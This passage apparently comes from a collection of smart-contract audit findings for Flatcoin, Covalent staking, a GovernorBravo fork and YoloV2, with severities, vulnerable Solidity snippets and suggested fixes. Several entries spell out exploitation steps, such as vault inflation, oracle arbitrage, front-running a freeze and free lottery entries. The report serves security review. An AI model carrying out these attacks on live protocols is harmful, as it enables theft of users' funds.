84 below.\\nAssume that the vault has been newly deployed on-chain. Bob is the first LP to deposit rETH into the vault. Assume for a period of time (e.g., around 30 minutes), there are no other users depositing into the vault except for Bob.\\nBob could perform the following actions to mint points for free:\\nBob announces a deposit order to deposit 100e18 rETH. Paid for the keeper fee. (Acting as a LP).\\nWait 10 seconds for the `minExecutabilityAge` to pass\\nBob executes the deposit order and mints 100e18 UNIT (Exchange rate 1:1). Protocol also mints 100e18 points to Bob's account. Bob gets back the keeper fee. (Acting as Keeper)\\nImmediately after his `executeDeposit` TX, Bob inserts an "announce withdraw order" TX to withdraw all his 100e18 UNIT and pay for the keeper fee.\\nWait 10 seconds for the `minExecutabilityAge` to pass\\nBob executes the withdraw order and receives back his initial investment of 100e18 rETH. Since he is the only LP in the protocol, it is considered the final/last withdrawal, and he does not need to pay any withdraw fee. He also got back his keeper fee. (Acting as Keeper)\\nEach attack requires 20 seconds (10 + 10) to be executed. 
Bob could rinse and repeat the attack until he was no longer the only LP in the system, where he had to pay for the withdraw fee, which might make this attack unprofitable.\\nIf Bob is the only LP in the system for 30 minutes, he could gain 9000e18 points ((30 minutes / 20 seconds) * 100e18 ) for free as Bob could get back his keeper fee and does not incur any withdraw fee. The only thing that Bob needs to pay for is the gas fee, which is extremely cheap on L2 like Base.\\n```\\nFile: StableModule.sol\\n function executeDeposit(\\n address _account,\\n uint64 _executableAtTime,\\n FlatcoinStructs.AnnouncedStableDeposit calldata _announcedDeposit\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _liquidityMinted) {\\n uint256 depositAmount = _announcedDeposit.depositAmount;\\n..SNIP..\\n _liquidityMinted = (depositAmount * (10 ** decimals())) / stableCollateralPerShare(maxAge);\\n..SNIP..\\n _mint(_account, _liquidityMinted);\\n\\n vault.updateStableCollateralTotal(int256(depositAmount));\\n..SNIP..\\n // Mint points\\n IPointsModule pointsModule = IPointsModule(vault.moduleAddress(FlatcoinModuleKeys._POINTS_MODULE_KEY));\\n pointsModule.mintDeposit(_account, _announcedDeposit.depositAmount);\\n```\\n
One approach that could mitigate this risk is to also impose the withdraw fee on the final/last withdrawal, so that no one can abuse this exception to make an otherwise unprofitable attack profitable.\\nIn addition, consider deducting the points once a position is closed or reduced in size so that no one can repeatedly open and adjust/close a position to obtain more points.
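A minimal sketch of the first suggestion against the `executeWithdraw()` snippet quoted in the description (illustrative only; the full-withdrawal invariant checks would need to be revisited accordingly):\\n```\\n// Charge the withdraw fee unconditionally, instead of only when totalSupply() > 0,\\n// so the final withdrawal no longer escapes the fee.\\n_withdrawFee = (stableWithdrawFee * _amountOut) / 1e18;\\n\\nif (totalSupply() > 0) {\\n    // existing price-impact check stays unchanged, then:\\n    vault.checkSkewMax({additionalSkew: 0});\\n} else {\\n    // full system withdrawal: still ensure no longs are open\\n    uint256 sizeOpenedTotal = vault.getVaultSummary().globalPositions.sizeOpenedTotal;\\n    if (sizeOpenedTotal != 0) revert FlatcoinErrors.MaxSkewReached(sizeOpenedTotal);\\n}\\n```\\n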
Large amounts of points can be minted virtually without any cost. The points are intended to be exchanged for something of value. A malicious user could abuse this to obtain a large number of points, which could extract excessive value from the protocol and create unfairness among other protocol users.
```\\nFile: StableModule.sol\\n function executeWithdraw(\\n address _account,\\n uint64 _executableAtTime,\\n FlatcoinStructs.AnnouncedStableWithdraw calldata _announcedWithdraw\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _amountOut, uint256 _withdrawFee) {\\n uint256 withdrawAmount = _announcedWithdraw.withdrawAmount;\\n..SNIP..\\n _burn(_account, withdrawAmount);\\n..SNIP..\\n // Check that there is no significant impact on stable token price.\\n // This should never happen and means that too much value or not enough value was withdrawn.\\n if (totalSupply() > 0) {\\n if (\\n stableCollateralPerShareAfter < stableCollateralPerShareBefore - 1e6 ||\\n stableCollateralPerShareAfter > stableCollateralPerShareBefore + 1e6\\n ) revert FlatcoinErrors.PriceImpactDuringWithdraw();\\n\\n // Apply the withdraw fee if it's not the final withdrawal.\\n _withdrawFee = (stableWithdrawFee * _amountOut) / 1e18;\\n\\n // additionalSkew = 0 because withdrawal was already processed above.\\n vault.checkSkewMax({additionalSkew: 0});\\n } else {\\n // Need to check there are no longs open before allowing full system withdrawal.\\n uint256 sizeOpenedTotal = vault.getVaultSummary().globalPositions.sizeOpenedTotal;\\n\\n if (sizeOpenedTotal != 0) revert FlatcoinErrors.MaxSkewReached(sizeOpenedTotal);\\n if (stableCollateralPerShareAfter != 1e18) revert FlatcoinErrors.PriceImpactDuringFullWithdraw();\\n }\\n```\\n
Vault Inflation Attack
medium
Malicious users can perform an inflation attack against the vault to steal the assets of the victim.\\nA malicious user can perform a donation to execute a classic first depositor/ERC4626 inflation attack against the FlatCoin vault. The general process of this attack is well-known, and a detailed explanation of it can be found in many public resources.\\nIn short, to kick-start the attack, the malicious user will usually mint the smallest possible amount of shares (e.g., 1 wei) and then donate significant assets to the vault to inflate the number of assets per share. This subsequently causes a rounding error when other users deposit.\\nHowever, in Flatcoin, there are various safeguards in place to mitigate this attack. Thus, one would need to perform additional steps to work around/bypass the existing controls.\\nLet's divide the setup of the attack into two main parts:\\nMalicious user mints 1 wei of shares\\nDonate or transfer assets to the vault to inflate the assets per share\\nPart 1 - Malicious user mints 1 wei of shares\\nUsers could attempt to mint 1 wei of shares. However, the validation check at Line 79 will revert as the shares minted are less than `MIN_LIQUIDITY` = 10_000. Nevertheless, this minimum liquidity requirement check can be bypassed.\\n```\\nFile: StableModule.sol\\n function executeDeposit(\\n address _account,\\n uint64 _executableAtTime,\\n FlatcoinStructs.AnnouncedStableDeposit calldata _announcedDeposit\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _liquidityMinted) {\\n uint256 depositAmount = _announcedDeposit.depositAmount;\\n\\n uint32 maxAge = _getMaxAge(_executableAtTime);\\n\\n _liquidityMinted = (depositAmount * (10 ** decimals())) / stableCollateralPerShare(maxAge);\\n\\n if (_liquidityMinted < _announcedDeposit.minAmountOut)\\n revert FlatcoinErrors.HighSlippage(_liquidityMinted, _announcedDeposit.minAmountOut);\\n\\n _mint(_account, _liquidityMinted);\\n\\n vault.updateStableCollateralTotal(int256(depositAmount));\\n\\n if (totalSupply() < MIN_LIQUIDITY) // @audit-info MIN_LIQUIDITY = 10_000\\n revert FlatcoinErrors.AmountTooSmall({amount: totalSupply(), minAmount: MIN_LIQUIDITY});\\n```\\n\\nFirst, Bob mints 10000 wei of shares via the `executeDeposit` function. Next, Bob withdraws 9999 wei of shares via `executeWithdraw`. In the end, Bob owns only 1 wei of shares, which is the prerequisite for this attack.\\nPart 2 - Donate or transfer assets to the vault to inflate the assets per share\\nThe vault tracks the amount of collateral within its state variables. Thus, simply transferring rETH collateral to the vault directly will not work, and the assets per share will remain the same.\\nTo work around this, Bob creates a large number of accounts (with different wallet addresses). He could choose either or both of the following methods to indirectly transfer collateral to the LP pool/vault to inflate the assets per share:\\nOpen a large number of leveraged long positions with the intention of incurring large amounts of losses. The long positions' losses are the gains of the LPs, and the collateral per share will increase.\\nOpen a large number of leveraged long positions up to the max skew of 120%. This will cause the funding rate to increase, and the longs will have to pay the LPs, which will also increase the collateral per share.\\nTriggering the rounding error\\nThe `stableCollateralPerShare` will be inflated at this point. 
The following is the formula used to determine the number of shares minted to the depositor.\\nIf the `depositAmount` by the victim is not sufficiently large, the amount of shares minted to the depositor will round down to zero.\\n```\\n_collateralPerShare = (stableBalance * (10 ** decimals())) / totalSupply;\\n_liquidityMinted = (depositAmount * (10 ** decimals())) / _collateralPerShare\\n```\\n\\nFinally, the attacker withdraws their shares from the pool. Since they are the only ones with any shares, this withdrawal equals the balance of the vault. This means the attacker also withdraws the tokens deposited by the victim earlier.
A `MIN_LIQUIDITY` amount of shares needs to exist within the vault to guard against a common inflation attack.\\nHowever, the current approach of only checking that `totalSupply() < MIN_LIQUIDITY` is not sufficient and can be bypassed by making use of the withdraw function.\\nA more robust approach to ensuring that there is always a minimum number of shares to guard against an inflation attack is to mint a certain amount of shares to the zero/dead address during the first deposit (similar to what Uniswap V2 does with its locked `MINIMUM_LIQUIDITY`).
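A minimal sketch of that mitigation inside `StableModule.executeDeposit()`; `DEAD_ADDRESS` is an assumed contract-level constant and `MIN_LIQUIDITY` is the existing 10_000 threshold from the quoted code:\\n```\\naddress private constant DEAD_ADDRESS = 0x000000000000000000000000000000000000dEaD; // assumed burn target\\n\\n// On the very first deposit, permanently lock MIN_LIQUIDITY shares so withdrawals can\\n// never reduce the share supply back down to dust.\\nif (totalSupply() == 0) {\\n    if (_liquidityMinted <= MIN_LIQUIDITY)\\n        revert FlatcoinErrors.AmountTooSmall({amount: _liquidityMinted, minAmount: MIN_LIQUIDITY});\\n    _mint(DEAD_ADDRESS, MIN_LIQUIDITY);\\n    _liquidityMinted -= MIN_LIQUIDITY;\\n}\\n_mint(_account, _liquidityMinted);\\n```\\n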
Malicious users could steal the assets of the victim.
```\\nFile: StableModule.sol\\n function executeDeposit(\\n address _account,\\n uint64 _executableAtTime,\\n FlatcoinStructs.AnnouncedStableDeposit calldata _announcedDeposit\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _liquidityMinted) {\\n uint256 depositAmount = _announcedDeposit.depositAmount;\\n\\n uint32 maxAge = _getMaxAge(_executableAtTime);\\n\\n _liquidityMinted = (depositAmount * (10 ** decimals())) / stableCollateralPerShare(maxAge);\\n\\n if (_liquidityMinted < _announcedDeposit.minAmountOut)\\n revert FlatcoinErrors.HighSlippage(_liquidityMinted, _announcedDeposit.minAmountOut);\\n\\n _mint(_account, _liquidityMinted);\\n\\n vault.updateStableCollateralTotal(int256(depositAmount));\\n\\n if (totalSupply() < MIN_LIQUIDITY) // @audit-info MIN_LIQUIDITY = 10_000\\n revert FlatcoinErrors.AmountTooSmall({amount: totalSupply(), minAmount: MIN_LIQUIDITY});\\n```\\n
Long traders unable to withdraw their assets
medium
Whenever the protocol reaches a state where the long trader's profit is larger than LP's stable collateral total, the protocol will be bricked. As a result, the margin deposited and gain of the long traders can no longer be withdrawn and the LPs cannot withdraw their collateral, leading to a loss of assets for the users.\\nPer Line 97 below, if the collateral balance is less than the tracked balance, the `_getCollateralNet` invariant check will revert.\\n```\\nFile: InvariantChecks.sol\\n /// @dev Returns the difference between actual total collateral balance in the vault vs tracked collateral\\n /// Tracked collateral should be updated when depositing to stable LP (stableCollateralTotal) or\\n /// opening leveraged positions (marginDepositedTotal).\\n /// TODO: Account for margin of error due to rounding.\\n function _getCollateralNet(IFlatcoinVault vault) private view returns (uint256 netCollateral) {\\n uint256 collateralBalance = vault.collateral().balanceOf(address(vault));\\n uint256 trackedCollateral = vault.stableCollateralTotal() + vault.getGlobalPositions().marginDepositedTotal;\\n\\n if (collateralBalance < trackedCollateral) revert FlatcoinErrors.InvariantViolation("collateralNet");\\n\\n return collateralBalance - trackedCollateral;\\n }\\n```\\n\\nAssume that:\\nBob's long position: Margin = 50 ETH\\nAlice's LP: Deposited = 50 ETH\\nCollateral Balance = 100 ETH\\nTracked Balance = 100 ETH (Stable Collateral Total = 50 ETH, Margin Deposited Total = 50 ETH)\\nAssume that Bob's long position gains a profit of 51 ETH.\\nThe following actions will trigger the `updateGlobalPositionData` function internally: executeOpen, executeAdjust, executeClose, and liquidation.\\nWhen the `FlatcoinVault.updateGlobalPositionData` function is triggered to update the global position data:\\n```\\nprofitLossTotal = 51 ETH (gain by long)\\n\\nnewMarginDepositedTotal = marginDepositedTotal + marginDelta + profitLossTotal\\nnewMarginDepositedTotal = 50 ETH + 0 + 51 ETH = 101 ETH\\n\\n_updateStableCollateralTotal(-51 ETH)\\nnewStableCollateralTotal = stableCollateralTotal + _stableCollateralAdjustment\\nnewStableCollateralTotal = 50 ETH + (-51 ETH) = -1 ETH\\nstableCollateralTotal = (newStableCollateralTotal > 0) ? newStableCollateralTotal : 0;\\nstableCollateralTotal = 0\\n```\\n\\nIn this case, the state becomes as follows:\\nCollateral Balance = 100 ETH\\nTracked Balance = 101 ETH (Stable Collateral Total = 0 ETH, Margin Deposited Total = 101 ETH)\\nNotice that the Collateral Balance and Tracked Balance are no longer in sync. As such, the revert will occur when the `_getCollateralNet` invariant checks are performed.\\nWhenever the protocol reaches a state where the long trader's profit is larger than LP's stable collateral total, this issue will occur, and the protocol will be bricked. The margin deposited and gain of the long traders can no longer be withdrawn from the protocol. The LPs also cannot withdraw their collateral.\\nThe reason is that the `_getCollateralNet` invariant checks are performed in all functions of the protocol that can be accessed by users (listed below):\\nDeposit\\nWithdraw\\nOpen Position\\nAdjust Position\\nClose Position\\nLiquidate
Currently, when the LPs' loss is more than the existing `stableCollateralTotal`, the `stableCollateralTotal` is floored at zero and does not go negative. In the above example, the `stableCollateralTotal` is 50 and the loss is 51, so the `stableCollateralTotal` is set to zero instead of -1.\\nThe LPs' loss and the traders' gain should be aligned or symmetric. However, this is not the case in the current implementation. In the above example, the traders' gain is 51 while the LPs' loss is 50, which results in a discrepancy.\\nTo fix the issue, the LPs' loss and the traders' gain should be aligned. For instance, in the above example, if the LPs' loss is capped at 50, then the traders' profit must also be capped at 50.\\nThe following is the high-level logic of the fix:\\n```\\nIf (profitLossTotal > stableCollateralTotal): // (51 > 50) => True\\n profitLossTotal = stableCollateralTotal // profitLossTotal = 50\\n \\nnewMarginDepositedTotal = marginDepositedTotal + marginDelta + profitLossTotal // 50 + 0 + 50 = 100\\n \\nnewStableCollateralTotal = stableCollateralTotal + (-profitLossTotal) // 50 + (-50) = 0\\nstableCollateralTotal = (newStableCollateralTotal > 0) ? newStableCollateralTotal : 0; // stableCollateralTotal = 0\\n```\\n\\nThe worked values in the comments above show that the logic behaves as intended for the earlier example.
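A minimal sketch of how the cap could look inside `FlatcoinVault.updateGlobalPositionData()`; the exact signature of `PerpMath._profitLossTotal` and the surrounding variable names are assumptions based on the walkthrough above:\\n```\\nint256 profitLossTotal = PerpMath._profitLossTotal(_globalPositions, price); // assumed signature\\n\\n// Keep the traders' aggregate gain symmetric with the LPs' loss: never credit the longs\\n// with more than the stable collateral can actually cover.\\nif (profitLossTotal > int256(stableCollateralTotal)) {\\n    profitLossTotal = int256(stableCollateralTotal);\\n}\\n\\nint256 newMarginDepositedTotal =\\n    int256(_globalPositions.marginDepositedTotal) + marginDelta + profitLossTotal;\\n_globalPositions.marginDepositedTotal = newMarginDepositedTotal > 0 ? uint256(newMarginDepositedTotal) : 0;\\n\\n_updateStableCollateralTotal(-profitLossTotal);\\n```\\n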
Loss of assets for the users. Since the protocol is bricked by the revert, the long traders are unable to withdraw their deposited margin and gains, and the LPs cannot withdraw their collateral.
```\\nFile: InvariantChecks.sol\\n /// @dev Returns the difference between actual total collateral balance in the vault vs tracked collateral\\n /// Tracked collateral should be updated when depositing to stable LP (stableCollateralTotal) or\\n /// opening leveraged positions (marginDepositedTotal).\\n /// TODO: Account for margin of error due to rounding.\\n function _getCollateralNet(IFlatcoinVault vault) private view returns (uint256 netCollateral) {\\n uint256 collateralBalance = vault.collateral().balanceOf(address(vault));\\n uint256 trackedCollateral = vault.stableCollateralTotal() + vault.getGlobalPositions().marginDepositedTotal;\\n\\n if (collateralBalance < trackedCollateral) revert FlatcoinErrors.InvariantViolation("collateralNet");\\n\\n return collateralBalance - trackedCollateral;\\n }\\n```\\n
Oracle can return different prices in same transaction
medium
The Pyth network oracle contract allows to submit and read two different prices in the same transaction. This can be used to create arbitrage opportunities that can make a profit with no risk at the expense of users on the other side of the trade.\\n`OracleModule.sol` uses Pyth network as the primary source of price feeds. This oracle works in the following way:\\nA dedicated network keeps track of the latest price consensus, together with the timestamp.\\nThis data is queried off-chain and submitted to the on-chain oracle.\\nIt is checked that the data submitted is valid and the new price data is stored.\\nNew requests for the latest price will now return the data submitted until a more recent price is submitted.\\nOne thing to note is that the Pyth network is constantly updating the latest price (every 400ms), so when a new price is submitted on-chain it is not necessary that the price is the latest one. Otherwise, the process of querying the data off-chain, building the transaction, and submitting it on-chain would be required to be done with a latency of less than 400ms, which is not feasible. This makes it possible to submit two different prices in the same transaction and, thus, fetch two different prices in the same transaction.\\nThis can be used to create some arbitrage opportunities that can make a profit with no risk.\\nHow this can be exploited\\nAn example of how this can be exploited, and showed in the PoC, would be:\\nCreate a small leverage position.\\nAnnounce an adjustment order to increase the size of the position by some amount.\\nIn the same block, announce a limit close order.\\nAfter the minimum execution time has elapsed, retrieve two prices from the Pyth oracle where the second price is higher than the first one.\\nExecute the adjustment order sending the first price.\\nExecute the limit close order sending the second price.\\nThe result is approximately a profit of\\n```\\nadjustmentSize * (secondPrice - firstPrice) - (adjustmentSize * tradeFees * 2)\\n```\\n\\nNote: For simplicity, we do not take into account the initial size of the position, which in any case can be insignificant compared to the adjustment size. The keeper fee is also not included, as is the owner of the position that is executing the orders.\\nThe following things are required to make a profit out of this attack:\\nSubmit the orders before other keepers. This can be easily achieved, as there are not always enough incentives to execute the orders as soon as possible.\\nObtain a positive delta between two prices in the time frame where the orders are executable that is greater than twice the trade fees. This can be very feasible, especially in moments of high volatility. 
Note also that this requirement can be lowered to a delta greater than a single trade fee if we take into account that there is currently another vulnerability that allows avoiding the fees for the limit order.\\nIf the required delta cannot be obtained, or a keeper has already submitted a transaction to execute the orders before the delta is obtained, the user can simply cancel the limit order and have just the adjustment order executed.\\nAnother possible strategy involves the following steps:\\nCreate a leverage position.\\nAnnounce another leverage position with the same size.\\nIn the same block, announce a limit close order.\\nAfter the minimum execution time has elapsed, retrieve two prices from the Pyth oracle where the second price is lower than the first one.\\nExecute the limit close order sending the first price.\\nExecute the open order sending the second price.\\nThe result in this case is a position with the same size as the original one, but with either a lowered `position.lastPrice` or a profit taken from the original position, depending on how the price has moved since the original position was opened.\\n\\n
```\\nFile: OracleModule.sol\\n FlatcoinStructs.OffchainOracle public offchainOracle; // Offchain Pyth network oracle\\n\\n// Add the line below\\n uint256 public lastOffchainUpdate;\\n\\n (// rest of code)\\n\\n function updatePythPrice(address sender, bytes[] calldata priceUpdateData) external payable nonReentrant {\\n// Add the line below\\n if (lastOffchainUpdate >= block.timestamp) return;\\n// Add the line below\\n lastOffchainUpdate = block.timestamp;\\n// Add the line below\\n\\n // Get fee amount to pay to Pyth\\n uint256 fee = offchainOracle.oracleContract.getUpdateFee(priceUpdateData);\\n```\\n
Different oracle prices can be fetched in the same transaction, which can be used to create arbitrage opportunities that can make a profit with no risk at the expense of users on the other side of the trade.
```\\nadjustmentSize * (secondPrice - firstPrice) - (adjustmentSize * tradeFees * 2)\\n```\\n
OperationalStaking may not possess enough CQT for the last withdrawal
medium
Both `_sharesToTokens` and `_tokensToShares` round down instead of rounding against the user. This can result in users withdrawing a few wei more than they should, which in turn would make the last CQT transfer from the contract revert due to insufficient balance.\\nWhen users `stake`, the shares they will receive are calculated via _tokensToShares:\\n```\\n function _tokensToShares(\\n uint128 amount,\\n uint128 rate\\n ) internal view returns (uint128) {\\n return uint128((uint256(amount) * DIVIDER) / uint256(rate));\\n }\\n```\\n\\nSo the rounding is against the user (or exact if the user provided the right amount of CQT).\\nWhen users unstake, their shares are decreased by\\n```\\n function _sharesToTokens(\\n uint128 sharesN,\\n uint128 rate\\n ) internal view returns (uint128) {\\n return uint128((uint256(sharesN) * uint256(rate)) / DIVIDER);\\n }\\n```\\n\\nSo it is possible to `stake` and `unstake` such amounts that a dust amount of shares is left on the user's balance after their full withdrawal. However, dust amounts cannot be withdrawn due to the check in _redeemRewards:\\n```\\n require(\\n effectiveAmount >= REWARD_REDEEM_THRESHOLD,\\n "Requested amount must be higher than redeem threshold"\\n );\\n```\\n\\nBut if the user does not withdraw immediately, and instead does it after the multiplier is increased, the dust he received from the rounding error becomes withdrawable, because his `totalUnlockedValue` becomes greater than `REWARD_REDEEM_THRESHOLD`.\\nSo the user will end up withdrawing more than their `initialStake + shareOfRewards`, which means that, if the rounding after all other operations stays net-zero for the protocol, there won't be enough CQT for the last CQT withdrawal (be it `transferUnstakedOut`, `redeemRewards`, or `redeemCommission`).
`_sharesToTokens` and `_tokensToShares` should always round against the user instead of always rounding down.
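A minimal sketch of direction-aware rounding, assuming the existing `DIVIDER` scaling constant; the helper names are hypothetical and each call site would pick the variant that disfavours the user (round shares up when burning them for an unstake, round tokens down when paying out):\\n```\\n// Hypothetical helper: burn at least the fair number of shares for a requested token amount.\\nfunction _tokensToSharesRoundUp(uint128 amount, uint128 rate) internal view returns (uint128) {\\n    return uint128((uint256(amount) * DIVIDER + uint256(rate) - 1) / uint256(rate));\\n}\\n\\n// Identical to the existing _sharesToTokens: never pay out more than the shares are worth.\\nfunction _sharesToTokensRoundDown(uint128 sharesN, uint128 rate) internal view returns (uint128) {\\n    return uint128((uint256(sharesN) * uint256(rate)) / DIVIDER);\\n}\\n```\\n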
The victim's transactions will keep reverting unless they figure out that they need to decrease their withdrawal amount.
```\\n function _tokensToShares(\\n uint128 amount,\\n uint128 rate\\n ) internal view returns (uint128) {\\n return uint128((uint256(amount) * DIVIDER) / uint256(rate));\\n }\\n```\\n
Frontrunning validator freeze to withdraw tokens
medium
Covalent implements a freeze mechanism to disable malicious validators; this allows the protocol to block all interactions with a validator when he behaves maliciously. Covalent also implements a timelock to ensure tokens are only withdrawn after a certain amount of time. After the cooldown ends, tokens can always be withdrawn.\\nThis creates the following problem: because the tokens can always be withdrawn, a malicious validator can listen for a potential "freeze" transaction in the mempool, front-run this transaction to unstake his tokens, and withdraw them after the cooldown ends.\\nAlmost every action on the Operational Staking contract checks if the validator is frozen or not:\\n```\\n require(!v.frozen, "Validator is frozen");\\n```\\n\\nThe methods transferUnstakedOut() and recoverUnstaking() do not perform this check, making the freeze transaction front-runnable with an unstake. Here are the only checks of transferUnstakedOut():\\n```\\nrequire(validatorId < validatorsN, "Invalid validator");\\n require(_validators[validatorId].unstakings[msg.sender].length > unstakingId, "Unstaking does not exist");\\n Unstaking storage us = _validators[validatorId].unstakings[msg.sender][unstakingId];\\n require(us.amount >= amount, "Unstaking has less tokens");\\n```\\n\\nThis makes the following attack possible:\\nThe validator cheats and gets rewarded fees.\\nThe protocol notices the misbehavior and initiates a freeze transaction.\\nThe validator sees the transaction and submits an unstake() transaction with a higher gas price.\\nThe validator gets frozen, but the unstaking is already done.\\nThe validator waits for the cooldown and withdraws the tokens.\\nNow the validator has kept the unfairly obtained rewards and withdrawn his stake.
Check whether the validator is frozen in `transferUnstakedOut()` and `recoverUnstaking()`, and revert the transaction if so.\\nIf freezing all unstakings is undesirable (e.g. to avoid freezing honest unstakes), the sponsor may consider storing the unstake block number as well:\\nStore the unstaking block number for each unstake.\\nFreeze the validator from a certain past block only, so that only unstakings that occur from that block onwards are frozen.
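A minimal sketch of the guard at the top of both `transferUnstakedOut()` and `recoverUnstaking()`; the storage names follow the quoted snippets, while `unstakedAtBlock` / `frozenAtBlock` in the commented refinement are hypothetical additions:\\n```\\nValidator storage v = _validators[validatorId];\\nUnstaking storage us = v.unstakings[msg.sender][unstakingId];\\n\\n// Simple variant: block all unstaking flows while the validator is frozen.\\nrequire(!v.frozen, "Validator is frozen");\\n\\n// Refined variant (hypothetical fields): only block unstakings created at or after the\\n// freeze block, so honest unstakes made before the misbehaviour are unaffected.\\n// require(!v.frozen || us.unstakedAtBlock < v.frozenAtBlock, "Unstaking is frozen");\\n```\\n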
Malicious validators can front-run a freeze transaction to withdraw their tokens.
```\\n require(!v.frozen, "Validator is frozen");\\n```\\n
`validatorMaxStake` can be bypassed by using `setValidatorAddress()`
medium
`setValidatorAddress()` allows a validator to migrate to a new address of their choice. However, the current logic only stacks up the old address' stake to the new one, never checking `validatorMaxStake`.\\nThe current logic for `setValidatorAddress()` is as follow:\\n```\\nfunction setValidatorAddress(uint128 validatorId, address newAddress) external whenNotPaused {\\n // // rest of code\\n v.stakings[newAddress].shares += v.stakings[msg.sender].shares;\\n v.stakings[newAddress].staked += v.stakings[msg.sender].staked;\\n delete v.stakings[msg.sender];\\n // // rest of code\\n}\\n```\\n\\nThe old address' stake is simply stacked on top of the new address' stake. There are no other checks for this amount, even though the new address may already have contained a stake.\\nThen the combined total of the two stakings may exceed `validatorMaxStake`. This accordingly allows the new (validator) staker's amount to bypass said threshold, breaking an important invariant of the protocol.\\nBob the validator has a self-stake equal to `validatorMaxStake`.\\nBob has another address, B2, with some stake delegated to Bob's validator.\\nBob migrates to B2.\\nBob's stake is stacked on top of B2. B2 becomes the new validator address, but their stake has exceeded `validatorMaxStake`.\\nB2 can then repeated this procedure to addresses B3, B4, ..., despite B2 already holding more than the max allowed amount.\\nBob now holds more stake than he should be able to, allowing him to earn an unfair amount of rewards compared to other validators.\\nWe also note that, even if the admin tries to freeze Bob, he can front-run the freeze with an unstake, since unstakes are not blocked from withdrawing (after cooldown ends).
Check that the new address's total stake does not exceed `validatorMaxStake` before proceeding with the migration.
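A minimal sketch of the check inside `setValidatorAddress()`; the bookkeeping follows the snippet quoted in the description and `validatorMaxStake` is the existing cap:\\n```\\nValidator storage v = _validators[validatorId];\\n\\n// Reject the migration if the merged self-stake would exceed the per-validator cap.\\nuint128 combinedStake = v.stakings[newAddress].staked + v.stakings[msg.sender].staked;\\nrequire(combinedStake <= validatorMaxStake, "Validator max stake exceeded");\\n\\nv.stakings[newAddress].shares += v.stakings[msg.sender].shares;\\nv.stakings[newAddress].staked += v.stakings[msg.sender].staked;\\ndelete v.stakings[msg.sender];\\n```\\n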
Breaking an important invariant of the protocol.\\nAllowing any validator to bypass the max stake amount. This in turn allows them to earn an unfair amount of validator rewards in the process.\\nAllows a validator to unfairly increase their max delegator amount, as an effect of increasing `(validator stake) * maxCapMultiplier`.
```\\nfunction setValidatorAddress(uint128 validatorId, address newAddress) external whenNotPaused {\\n // // rest of code\\n v.stakings[newAddress].shares += v.stakings[msg.sender].shares;\\n v.stakings[newAddress].staked += v.stakings[msg.sender].staked;\\n delete v.stakings[msg.sender];\\n // // rest of code\\n}\\n```\\n
Nobody can cast a vote for any proposal
medium
```\\nFile: bophades\\src\\external\\governance\\GovernorBravoDelegate.sol\\n function castVoteInternal(\\n address voter,\\n uint256 proposalId,\\n uint8 support\\n ) internal returns (uint256) {\\n// rest of code// rest of code\\n // Get the user's votes at the start of the proposal and at the time of voting. Take the minimum.\\n uint256 originalVotes = gohm.getPriorVotes(voter, proposal.startBlock);\\n446:-> uint256 currentVotes = gohm.getPriorVotes(voter, block.number);\\n uint256 votes = currentVotes > originalVotes ? originalVotes : currentVotes;\\n// rest of code// rest of code\\n }\\n```\\n\\n```\\nfunction getPriorVotes(address account, uint256 blockNumber) external view returns (uint256) {\\n-> require(blockNumber < block.number, "gOHM::getPriorVotes: not yet determined");\\n// rest of code// rest of code\\n }\\n```\\n\\n`gOHM.getPriorVotes()` requires `blockNumber < block.number`, but `castVoteInternal()` passes the current `block.number` at L446. Therefore, L446 will always revert and voting will not be possible.\\nA coded PoC can be copied into a Foundry project and run with `forge test -vvv` to prove this issue.
```\\nFile: bophades\\src\\external\\governance\\GovernorBravoDelegate.sol\\n uint256 originalVotes = gohm.getPriorVotes(voter, proposal.startBlock);\\n446:- uint256 currentVotes = gohm.getPriorVotes(voter, block.number);\\n446:+ uint256 currentVotes = gohm.getPriorVotes(voter, block.number - 1);\\n uint256 votes = currentVotes > originalVotes ? originalVotes : currentVotes;\\n```\\n\\n
Nobody can cast a vote for any proposal. Not being able to vote means the entire governance contract will be useless; core functionality is broken.
```\\nFile: bophades\\src\\external\\governance\\GovernorBravoDelegate.sol\\n function castVoteInternal(\\n address voter,\\n uint256 proposalId,\\n uint8 support\\n ) internal returns (uint256) {\\n// rest of code// rest of code\\n // Get the user's votes at the start of the proposal and at the time of voting. Take the minimum.\\n uint256 originalVotes = gohm.getPriorVotes(voter, proposal.startBlock);\\n446:-> uint256 currentVotes = gohm.getPriorVotes(voter, block.number);\\n uint256 votes = currentVotes > originalVotes ? originalVotes : currentVotes;\\n// rest of code// rest of code\\n }\\n```\\n
User can get free entries if the price of any whitelisted ERC20 token is greater than the round's `valuePerEntry`
high
Lack of explicit separation between ERC20 and ERC721 deposits allows users to gain free entries for any round given there exists a whitelisted ERC20 token with price greater than the round's `valuePerEntry`.\\n```\\n if (isCurrencyAllowed[tokenAddress] != 1) {\\n revert InvalidCollection();\\n }\\n```\\n\\n```\\n if (singleDeposit.tokenType == YoloV2__TokenType.ERC721) {\\n if (price == 0) {\\n price = _getReservoirPrice(singleDeposit);\\n prices[tokenAddress][roundId] = price;\\n }\\n```\\n\\n```\\n uint256 entriesCount = price / round.valuePerEntry;\\n if (entriesCount == 0) {\\n revert InvalidValue();\\n }\\n```\\n\\n```\\n } else if (tokenType == TokenType.ERC721) {\\n for (uint256 j; j < itemIdsLengthForSingleCollection; ) {\\n // rest of code\\n _executeERC721TransferFrom(items[i].tokenAddress, from, to, itemIds[j]);\\n```\\n\\n```\\n function _executeERC721TransferFrom(address collection, address from, address to, uint256 tokenId) internal {\\n // rest of code\\n (bool status, ) = collection.call(abi.encodeCall(IERC721.transferFrom, (from, to, tokenId)));\\n // rest of code\\n }\\n```\\n\\nThe function signature of `transferFrom` for ERC721 and ERC20 is identical, so this will call `transferFrom` on the ERC20 contract with `amount = 0` (since 'token ids' specified in `singleDeposit.tokenIdsOrAmounts` are all 0). Consequently, the user pays nothing and the transaction executes successfully (as long as the ERC20 token does not revert on zero transfers).\\nPaste the test below into `Yolo.deposit.t.sol` with `forge-std/console.sol` imported. It demonstrates a user making 3 free deposits (in the same transaction) using the MKR token (ie. with zero MKR balance). The token used can be substituted with any token with price > `valuePerEntry = 0.01 ETH` (which is non-rebasing/non-taxable and has sufficient liquidity in their /ETH Uniswap v3 pool as specified in the README).\\n
Whitelist tokens using both the token address and the token type (ERC20/ERC721).
